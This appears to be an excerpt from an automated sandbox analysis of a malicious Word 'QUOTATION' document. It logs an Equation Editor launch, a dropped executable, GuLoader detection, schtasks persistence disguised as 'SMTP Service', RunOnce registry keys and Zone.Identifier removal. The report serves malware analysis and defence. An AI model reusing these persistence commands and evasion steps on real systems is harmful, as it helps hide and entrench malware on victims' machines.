Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: QUOTATIONs44888_A2221_TOAN_TAN_LOC_TRADING_SERVICES_JOINT_STOCKs.doc	Virustotal: Detection: 39%
Source: QUOTATIONs44888_A2221_TOAN_TAN_LOC_TRADING_SERVICES_JOINT_STOCKs.doc	ReversingLabs: Detection: 25%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: unknown	Process created: C:\Users\Public\69577.exe C:\Users\Public\69577.exe
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe C:\Users\Public\69577.exe
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe C:\Users\Public\69577.exe
Source: unknown	Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'SMTP Service' /xml 'C:\Users\user\AppData\Local\Temp\tmp9445.tmp'
Source: unknown	Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'SMTP Service Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp80F5.tmp'
Source: unknown	Process created: C:\Windows\System32\taskeng.exe taskeng.exe {DA6299CA-95CA-4E9D-8945-2CC05321254C} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1]
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe 0
Source: unknown	Process created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe 'C:\Program Files (x86)\SMTP Service\smtpsvc.exe' 0
Source: unknown	Process created: C:\Users\user\subfolder1\filename1.exe 'C:\Users\user\subfolder1\filename1.exe'
Source: unknown	Process created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe 'C:\Program Files (x86)\SMTP Service\smtpsvc.exe'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\69577.exe C:\Users\Public\69577.exe	Jump to behavior
Source: C:\Users\Public\69577.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe C:\Users\Public\69577.exe	Jump to behavior
Source: C:\Users\Public\69577.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe C:\Users\Public\69577.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'SMTP Service' /xml 'C:\Users\user\AppData\Local\Temp\tmp9445.tmp'	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'SMTP Service Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp80F5.tmp'	Jump to behavior
Source: C:\Windows\System32\taskeng.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe 0	Jump to behavior
Source: C:\Windows\System32\taskeng.exe	Process created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe 'C:\Program Files (x86)\SMTP Service\smtpsvc.exe' 0	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: .pdb< source: RegAsm.exe, 00000006.00000002.2383237704.000000002114B000.00000004.00000001.sdmp
Source:	Binary string: ystem.pdb source: RegAsm.exe, 00000006.00000002.2371574970.0000000000576000.00000004.00000040.sdmp
Source:	Binary string: System.pdbSystem.pdbpdbtem.pdbm\2.0.0.0__b77a5c561934e089\System.pdb9FFP source: RegAsm.exe, 00000006.00000002.2383237704.000000002114B000.00000004.00000001.sdmp
Source:	Binary string: !symbols\dll\System.pdb source: RegAsm.exe, 00000006.00000002.2383237704.000000002114B000.00000004.00000001.sdmp
Source:	Binary string: System.pdb H~t source: RegAsm.exe, 00000006.00000002.2383237704.000000002114B000.00000004.00000001.sdmp
Source:	Binary string: nWindows\System.pdbpdbtem.pdb source: RegAsm.exe, 00000006.00000002.2371574970.0000000000576000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\dll\System.pdb source: RegAsm.exe, 00000006.00000002.2371574970.0000000000576000.00000004.00000040.sdmp
Source:	Binary string: WT3UpC:\Windows\System.pdb source: RegAsm.exe, 00000006.00000002.2383237704.000000002114B000.00000004.00000001.sdmp
Source:	Binary string: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.pdb source: RegAsm.exe, 00000006.00000002.2371574970.0000000000576000.00000004.00000040.sdmp
Source:	Binary string: < indows\RegAsm.pdbpdbAsm.pdb source: RegAsm.exe, 00000006.00000002.2371574970.0000000000576000.00000004.00000040.sdmp
Source:	Binary string: < indows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdb\cs source: RegAsm.exe, 00000006.00000002.2371574970.0000000000576000.00000004.00000040.sdmp
Source:	Binary string: RegAsm.pdb source: smtpsvc.exe, smtpsvc.exe.6.dr
Source:	Binary string: !C:\Windows\System.pdb@= source: RegAsm.exe, 00000006.00000002.2383237704.000000002114B000.00000004.00000001.sdmp
Source:	Binary string: Wm.pdb source: RegAsm.exe, 00000006.00000002.2383056342.00000000203CD000.00000004.00000001.sdmp
Source:	Binary string: C:\Windows\symbols\dll\System.pdb source: RegAsm.exe, 00000006.00000002.2371574970.0000000000576000.00000004.00000040.sdmp
Source:	Binary string: System.pdb source: RegAsm.exe, 00000006.00000002.2383237704.000000002114B000.00000004.00000001.sdmp
Source:	Binary string: System.pdb8 source: RegAsm.exe, 00000006.00000002.2371574970.0000000000576000.00000004.00000040.sdmp
Source:	Binary string: mscorrc.pdb source: RegAsm.exe, 00000006.00000002.2371259124.00000000000D0000.00000002.00000001.sdmp
Source:	Binary string: C:\Windows\System.pdb source: RegAsm.exe, 00000006.00000002.2371574970.0000000000576000.00000004.00000040.sdmp

Data Obfuscation:

Yara detected GuLoader

Show sources

Source: Yara match	File source: 00000006.00000002.2371533870.0000000000282000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 2488, type: MEMORY

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 6_2_1E370FAA push ds; retn 0024h		6_2_1E370FAC
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 6_2_1E370FF6 push ds; retn 0020h		6_2_1E371054

Persistence and Installation Behavior:

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\69577.exe	Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\wREzo[1].txt	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	File created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	File created: C:\Users\user\subfolder1\filename1.exe	Jump to dropped file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\69577.exe

Jump to dropped file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\wREzo[1].txt

Jump to dropped file

Boot Survival:

Drops PE files to the user root directory

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\69577.exe

Jump to dropped file

Uses schtasks.exe or at.exe to add and modify task schedules

Show sources

Source: unknown

Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'SMTP Service' /xml 'C:\Users\user\AppData\Local\Temp\tmp9445.tmp'

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce Startup key	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce Startup key	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce Startup key	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce Startup key	Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe:Zone.Identifier read attributes | delete

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
